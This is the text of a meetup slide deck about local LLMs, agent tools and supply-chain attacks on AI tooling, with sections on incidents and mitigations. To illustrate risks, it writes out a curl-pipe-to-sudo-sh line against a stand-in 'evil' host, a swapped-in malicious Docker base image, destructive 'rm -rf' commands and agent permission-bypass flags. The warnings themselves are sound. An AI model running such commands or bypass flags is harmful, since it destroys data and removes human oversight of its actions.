🦙

Local LLMs,
Agent Tools &
Supply Chain Nightmares

Manuel Gaar · PreciPoint AI Meetup · May 2026

or: what happens when your autocomplete gets sudo fnord

📋

00 · Agenda

Part 1 — Why local? Ollama, my rig, and the model zoo
Part 2 — Agent tools, local agents (OpenClaw vs Hermes), cloud agents, and the *.md config chaos
Part 3 — Supply chain nightmares, YOLO flags, and real-world incidents
Part 4 — Mitigations, vibe coding with git, agent isolation, and live demo

🏠

Why local?

Data stays on your machine — as long as it has no shell or tool access
No API costs, no rate limits, no "please upgrade to Pro"
Works offline — air-gapped deployments, no cloud dependency
You can fine-tune without selling your soul (or data) to a cloud provider

But "local" doesn't mean "safe":

A local LLM can read every file your user can read
Agent tools give it curl, ssh, access to internal APIs
It sits inside your network — behind the firewall
Think: intern with root access and no supervision

🦙

Ollama — LLMs as a service, but localhost

$ curl -fsSL https://ollama.com/install.sh | sh
# ^ yes, we'll talk about piping curl to sh later

$ ollama pull qwen3.5:9b
$ ollama pull gemma4:12b

# Chat mode
$ ollama run qwen3.5:9b

# API mode (OpenAI-compatible!)
$ curl http://localhost:11434/v1/chat/completions \
-d '{"model":"qwen3.5:9b","messages":[{"role":"user","content":"explain WebRTC in 3 sentences"}]}'

🖥️

My Rig — AMD all the way

CPU: AMD Ryzen 7 5800X
RAM: 64 GB DDR4
GPU: Radeon RX 6800 XT (16 GB VRAM)
ROCm: natively supported (gfx1030 / RDNA 2)
Runs Qwen 3.5:9B and Gemma 4:12B comfortably

# Windows System Environment Variables
# Settings → System → About → Advanced → Environment Variables

OLLAMA_HOST = 127.0.0.1
OLLAMA_FLASH_ATTENTION = 1
OLLAMA_GPU_OVERHEAD = 0
OLLAMA_API_KEY = d3b3a9****...****OUMad
HSA_OVERRIDE_GFX_VERSION = 10.3.0
ROCR_VISIBLE_DEVICES = 0

phife at phife-pc in ~
$ ollama ps
NAME ID SIZE PROCESSOR CONTEXT UNTIL
gemma4:latest c6eb396dbd59 13 GB 100% GPU 131072 5 minutes from now

13 GB model fits entirely in 16 GB VRAM — no CPU offload needed.

🐘

The Model Zoo

Qwen 3 (8B)

Alibaba's powerhouse. Great coding, multilingual, tool-calling built in. Runs on 8GB VRAM.

OSSLocal

Gemma 4 (12B)

Google's latest. Multimodal, strong reasoning, surprisingly good at agentic tasks.

OSSLocal

MiniMax M2.5

Chinese dark horse. 10B active params, 230B total MoE. Fastest-climbing on OpenRouter. Strong at agentic coding and tool use.

OSSCloud*

GPT-OSS (OpenAI)

OpenAI's first open weights since GPT-2. 20B runs on 16GB RAM. Native tool calling, MXFP4 quantized. Apache 2.0.

OSSLocal

* MiniMax M2.5 available via Ollama cloud or self-hosted with serious hardware

🛠️

Agent Tools — making LLMs do things

An LLM alone is just a fancy autocomplete. Agent frameworks give it:

Tool calling — run shell commands, read files, call APIs
Planning — break tasks into steps, iterate
Memory — context across sessions
Guardrails — so it doesn't rm -rf / your prod server

(the guardrails part is... a work in progress)

🤖

Local Agent Stack

OpenClaw / PicoClaw

Created by Peter Steinberger (Austria, ex-PSPDFKit). Now at OpenAI. Project moved to an open-source foundation. 247k+ GitHub stars.

OSS coding agent inspired by Claude Code
PicoClaw — minimal fork, runs on a Raspberry Pi
Focused on code: file editing, git, tests, commits
No built-in memory — add and maintain it yourself
Sandboxing available but needs manual setup
Browser & web search via skills/MCP
Messaging: Telegram, Discord, Slack, WhatsApp, iMessage
TTS, STT, image gen available via MCP servers / ClawHub skills — not built-in
Local Ollama models or cloud providers via API key
Complex and heavyweight — ~500 MB RAM for the gateway alone, no LLM loaded

Hermes Agent (NousResearch)

Built by Nous Research (US, $70M funded). Founded by Jeff Quesnelle, Karan Malhotra & Teknium. 50k+ GitHub stars in 46 days.

Full agentic platform, not just a coding tool
3-layer memory: MEMORY.md + USER.md (system prompt), SQLite FTS5 session search, pluggable providers (Mem0, Hindsight, etc.)
Learns reusable skills from completed tasks
Native Docker isolation with one config line
Dangerous command approval system built in
Built-in browser automation, web search & extraction
Gateway: Telegram, Discord, Slack, WhatsApp, Signal, Email
TTS (9 providers incl. Edge, ElevenLabs, OpenAI, MiniMax)
STT via local Whisper, Groq, OpenAI, or Mistral Voxtral
Image generation via FAL.ai (8 models incl. FLUX 2, GPT-Image)
Local Ollama models or cloud providers via API key

☁️

The Cloud Contenders

Claude Code

Anthropic's terminal agent. Reads your repo, edits files, runs tests. Scarily competent.

Closed

✓ Best code quality (subjective!)

Codex (OpenAI)

OpenAI's answer to Claude Code. Multi-file editing, sandboxed execution.

Closed

⚡ Sandboxed by default

Gemini CLI

Google's entry. Free tier generous. Works with Gemma locally too. Google-scale search built in.

Free tier

🔍 Grounding with Search

⚖️

Local vs Cloud — the honest truth

Local (Ollama + OpenClaw)

✅ Full data sovereignty
✅ No API costs
✅ Works offline / air-gapped
❌ Smaller models = less capable
❌ Your GPU, your electricity bill
❌ Limited context window on smaller models

Cloud (Claude Code et al.)

✅ Frontier model intelligence
✅ Web search, MCP, integrations
✅ Zero infra management
❌ Data leaves your machine
❌ Costs add up fast
❌ Rate limits at the worst moment

"Localhost is lava — until you realize the cloud is someone else's localhost." — the eternal DevOps koan

📄

The *.md file landscape

every tool invented its own config format — in markdown

CLAUDE.md — Claude Code project context
AGENTS.md — Linux Foundation "universal" standard
GEMINI.md — Google Gemini CLI
SOUL.md — Hermes agent persona & personality
MEMORY.md / USER.md — Hermes persistent memory
SKILL.md — portable agent skills (Claude, Codex, Hermes). OpenClaw has ClawHub — npm for agent skills, 15k+ published
copilot-instructions.md — GitHub Copilot
…and .cursorrules, .windsurfrules, JULES.md, and counting

The problem: same content, 10 different files, slowly drifting apart in every repo.

The workaround:

# one source of truth, symlinked everywhere
$ ln -sfn AGENTS.md .github/copilot-instructions.md
$ ln -sfn AGENTS.md .cursor/rules/main.mdc
# elegant? no. prevents drift? yes.

The bet: AGENTS.md becomes the README.md of agent config. Not because it's best — because Linux Foundation gravity wins.

Standards are great. That's why we have so many of them. fnord

💀

Now the scary part

Supply Chain Attacks on AI Tooling

Remember event-stream? Remember colors.js?

March 2026: LiteLLM — the most popular LLM proxy on PyPI (95M downloads/month) — was backdoored for 5 hours. Credential harvester, K8s lateral movement, persistent backdoor. The attack started with a compromised security scanner.

"Your vulnerability scanner stole the token that backdoored your AI gateway."

🎯

Attack Vectors

Malicious Model

→

ollama pull

→

Agent Framework

→

shell access

→

💀 game over

Typosquatting on Ollama Hub — llama4 vs lIama4 vs 1lama4
Poisoned image uploads — images with embedded prompt injection instructions that hijack multimodal agents
CI/CD credential cascades — TeamPCP: compromised Trivy → npm (CanisterWorm) → PyPI (LiteLLM) → 5 ecosystems in one week
Prompt injection via model weights — model trained to inject malicious tool calls
Malicious agent skills — ClawHub had 15k+ skills, 2,400 removed after the ClawHavoc incident. A SKILL.md can exfiltrate secrets or silently bias recommendations
MCP server compromise — your agent trusts the tool server implicitly

🔥

This is not hypothetical

LiteLLM — PyPI backdoor

March 24, 2026. TeamPCP compromised Trivy, stole a PyPI token, and backdoored LiteLLM.

pip install litellm==1.82.8

A .pth file fired on every Python startup — no import needed. Harvested SSH keys, cloud creds, K8s secrets. Deployed privileged pods to every node.

Axios — npm hijack

March 31, 2026. Compromised maintainer account. Malicious versions published to both latest and legacy tags.

npm install axios@1.14.1

Cross-platform RAT deployed in under 15 seconds. 100M weekly downloads. North Korean state actor (Sapphire Sleet).

npm typosquatting

Ongoing forever. One typo, one crypto miner. 454k malicious packages published to npm in 2025 alone.

npm install olama ← not ollama

The "helpful" agent

"I'll fix your Dockerfile." Agent quietly swaps in:

FROM evil-registry.io/totally-legit-ubuntu:latest

You approve the diff without reading it. Classic.

curl | sh — we all do it

curl -fsSL https://install.evil.ai | sudo sh

💣

The YOLO Bomb Shell Flags

every cloud agent ships a "please delete my career" flag

# Claude Code
$ claude --dangerously-skip-permissions
# Bypasses ALL permission prompts. File edits, shell commands, MCP tools.
# Real incident: user lost entire home dir via rm -rf ~/

# Codex CLI
$ codex --dangerously-bypass-approvals-and-sandbox
# Or just: codex --yolo
# Disables approvals AND the sandbox. Full host access.

# Gemini CLI
$ gemini --yolo
# Or mid-session: Ctrl+Y to enable. No undo.
# Can also be set as env var: GEMINI_YOLO_MODE=true

All three agents can read your files, run shell commands, and call APIs. These flags remove the only thing standing between the LLM and sudo rm -rf /.

YOLO — You Only Live Once. Which is exactly how many times you'll run rm -rf ~/ before learning your lesson. fnord

🛡️

Mitigations — what you can actually do

Pin model digests — ollama pull qwen3:8b@sha256:abc...
Run agents in containers — limit blast radius
Network isolation — agents don't need internet access (usually)
Review tool calls — human-in-the-loop for destructive ops
Use safetensors format — no pickle, no arbitrary code exec
Audit your MCP servers — they're just HTTP endpoints
Vet agent skills before installing — a SKILL.md is executable influence, treat it like a shell script
Lock file everything — npm lockfile, pip freeze, Ansible pin

Every pip install is a mass CVE generator. Every ollama pull is a trust exercise. Every SKILL.md is a shell script in a trenchcoat. fnord

🌿

Vibe Coding + Git

Without git

Agent rewrites files you didn't ask it to touch
"Small refactor" cascades across 15 files
YOLO flag deletes something you can't recover
You approve diffs without reading them

With git

Commit before every agent session
Feature branches only — agents never touch main
git diff before every commit
git reset --hard when it all goes wrong

How each agent handles it

Claude Code

Auto checkpoints before every change. Esc+Esc rollback. Refuses force-push to main. Auto-commit via PostToolUse hooks.

Hermes

Built-in checkpoints + /rollback command. Git worktree isolation via -w flag. Per-file restore supported.

OpenClaw

No built-in git safety. Bring your own discipline, your own hooks, your own branch strategy.

Git is not optional in the age of AI agents. It's the seatbelt. fnord

🔒

Agent Isolation — config compared

Hermes — 5 lines

# ~/.hermes/config.yaml
terminal:
  backend: docker
  persistent_shell: true
  timeout: 180
approvals:
  mode: manual

Read-only root FS, dropped capabilities, namespace isolation — all handled automatically.

OpenClaw — a bit more involved

# ~/.openclaw/openclaw.json
"agents": { "defaults": {
  "sandbox": {
    "mode": "all",
    "backend": "docker",
    "scope": "session",
    "workspaceAccess": "rw"
  }
}}
# + 3 permission layers to configure:
# agent tools, sandbox tools, network

Sandbox off by default. Network isolated by default. Three permission gates to align manually.

🎪

Live Demo

if the demo gods are merciful today

Demo 1 — OpenClaw

Ollama + Qwen 3.5:9B
OpenClaw in the browser
Code editing task

Demo 2 — Hermes

Ollama + Gemma 4:latest
Hermes via shell tool
Same task, different approach

Then: side-by-side with Claude Code on the same task. Spot the difference.

🧠

TL;DR

The stack

Local LLMs are ready for daily use — often more practical than reaching for a cloud model
Cloud agents are still king for complex refactors and reasoning
The best setup is hybrid — local for speed and privacy, cloud for heavy lifting
Money, API access, and hardware are the cheatcode. But nothing has really changed, same gold rush energy as the early internet days or when crypto came out

The risks

Supply chain security is the next frontier. Treat model pulls like Docker pulls or checking emails for phishing
Frontier models are more likely to be safe than open-source models. No model is audited anyway, especially not the small ones
Breaking changes are the new normal. Expect them weekly, not quarterly
Security incidents are more frequent, more cascaded, and hit harder than ever

Working with AI agents — lessons learned

Always read the response and the tool calls carefully — not just the summary
Reducing context helps — shorter prompts, focused sessions, fresh conversations
"Don't" directives work surprisingly well — tell the model what to avoid, not just what to do
The pace is insane — agents get vibe-coded updates almost daily, every commit is a release, the tooling you learned last week is already outdated

🔧

How this was built

Claude Pro subscription — Anthropic's consumer plan
Claude Opus 4.6 — frontier model, not a local lightweight
Claude Code — running natively in a Debian WSL shell, isolated workspace
Manuel in the loop — every slide reviewed, corrected, and iterated on by a human

No PowerPoint, no framework, no browser IDE. Just Claude Code in a terminal, a frontier model, and a human who kept saying "no, rephrase that."

~50 turns of back-and-forth
~1.1M tokens consumed (AI estimation^^)
2x daily rate limit hit
~4 hours including research
Web search for every technical claim
22 slides, ~1000 lines of HTML/CSS/JS
Zero npm/pip dependencies

The model wrote the code. The human steered the content. Neither would have finished alone.

📡

Links & Resources

ollama.com — Get started in 30 seconds
OpenClaw — OSS coding agent, Claude Code inspired
PicoClaw — Lightweight OpenClaw fork
Claude Code docs — The cloud contender
google/osv-scanner — OSS vulnerability scanner, guided remediation
openrouter.ai — Unified API for 200+ models, one key

Questions? (or complaints about this not being PowerPoint)

No models were audited. No SKILL.md was reviewed. YOLO.

No Raspberry Pis, Hetzner VMs, or open-source models were harmed during this exploration. fnord

Disclaimer: this presentation is most likely outdated by the time you watch it. That's the point.

Local LLMs, Agent Tools & Supply Chain Nightmares

Manuel Gaar · PreciPoint AI Meetup · May 2026

00 · Agenda

Why local?

Ollama — LLMs as a service, but localhost

My Rig — AMD all the way

The Model Zoo

Qwen 3 (8B)

Gemma 4 (12B)

MiniMax M2.5

GPT-OSS (OpenAI)

Agent Tools — making LLMs do things

Local Agent Stack

OpenClaw / PicoClaw

Hermes Agent (NousResearch)

The Cloud Contenders

Claude Code

Codex (OpenAI)

Gemini CLI

Local vs Cloud — the honest truth

Local (Ollama + OpenClaw)

Cloud (Claude Code et al.)

The *.md file landscape

every tool invented its own config format — in markdown

Now the scary part

Supply Chain Attacks on AI Tooling

Attack Vectors

This is not hypothetical

LiteLLM — PyPI backdoor

Axios — npm hijack

npm typosquatting

The "helpful" agent

curl | sh — we all do it

The YOLO Bomb Shell Flags

every cloud agent ships a "please delete my career" flag

Mitigations — what you can actually do

Vibe Coding + Git

Without git

With git

How each agent handles it

Claude Code

Hermes

OpenClaw

Agent Isolation — config compared

Hermes — 5 lines

OpenClaw — a bit more involved

Live Demo

if the demo gods are merciful today

Demo 1 — OpenClaw

Demo 2 — Hermes

TL;DR

The stack

The risks

Working with AI agents — lessons learned

How this was built

Links & Resources

Local LLMs,
Agent Tools &
Supply Chain Nightmares